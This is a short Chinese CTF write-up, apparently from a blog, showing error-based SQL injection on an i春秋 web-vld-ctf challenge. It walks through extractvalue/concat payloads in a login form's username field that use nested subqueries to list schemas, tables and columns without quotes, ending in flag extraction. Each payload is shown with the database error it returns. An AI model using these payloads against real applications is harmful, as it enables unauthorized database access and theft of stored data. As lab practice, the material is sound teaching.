报错注入下,极其灵活的sql查询方法同时解决引号被过滤的情况下查库很麻烦的小技巧

  • 报错注入下,极其灵活的sql查询方法同时解决引号被过滤的情况下查库很麻烦的小技巧。

  • 以i春秋web-vld-ctf为例

  • 所需知识

  • limit 1 = limit 1,1

  • number=0&username=%00' and extractvalue(1,concat(1,( select schema_name from information_schema.schemata limit 1 ) )) %23 &password=

  • 数据库执行错误!XPATH syntax error: ‘information_schema’ ,第一个库名

  • number=0&username=%00' and extractvalue(1,concat(1,( select schema_name from information_schema.schemata limit 1,1 ) )) %23 &password=

  • 数据库执行错误!XPATH syntax error: ‘ctf’ ,第二个库名

  • ``
    number=0&username=%00’ and extractvalue(1,concat(1,( select table_name from information_schema.tables where table_schema=(select schema_name from information_schema.schemata limit 1,1) limit 1 ) )) %23 &password=

  • ``

  • 数据库执行错误!XPATH syntax error: ‘flag’ , 在库ctf下的,第一个表名

  • number=0&username=%00' and extractvalue(1,concat(1,( select table_name from information_schema.tables where table_schema=(select schema_name from information_schema.schemata limit 1,1) limit 1,1 ) )) %23 &password=

  • 数据库执行错误!XPATH syntax error: ‘users’ , 在库ctf下的,第二个表名

  • number=0&username=%00' and extractvalue(1,concat(1,( select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=(select schema_name from information_schema.schemata limit 1,1) limit 1 )limit 1 ) )) %23 &password=

  • 数据库执行错误!XPATH syntax error: ‘flag’ , 在库ctf下,表flag,第一个列名。

  • number=0&username=%00' and extractvalue(1,concat(1,( select flag from flag ) )) %23 &password=

  • 数据库执行错误!XPATH syntax error: ‘flag{0cf07f57-72eb-4b8a-a2ae-155’

你可能感兴趣的:(sql注入)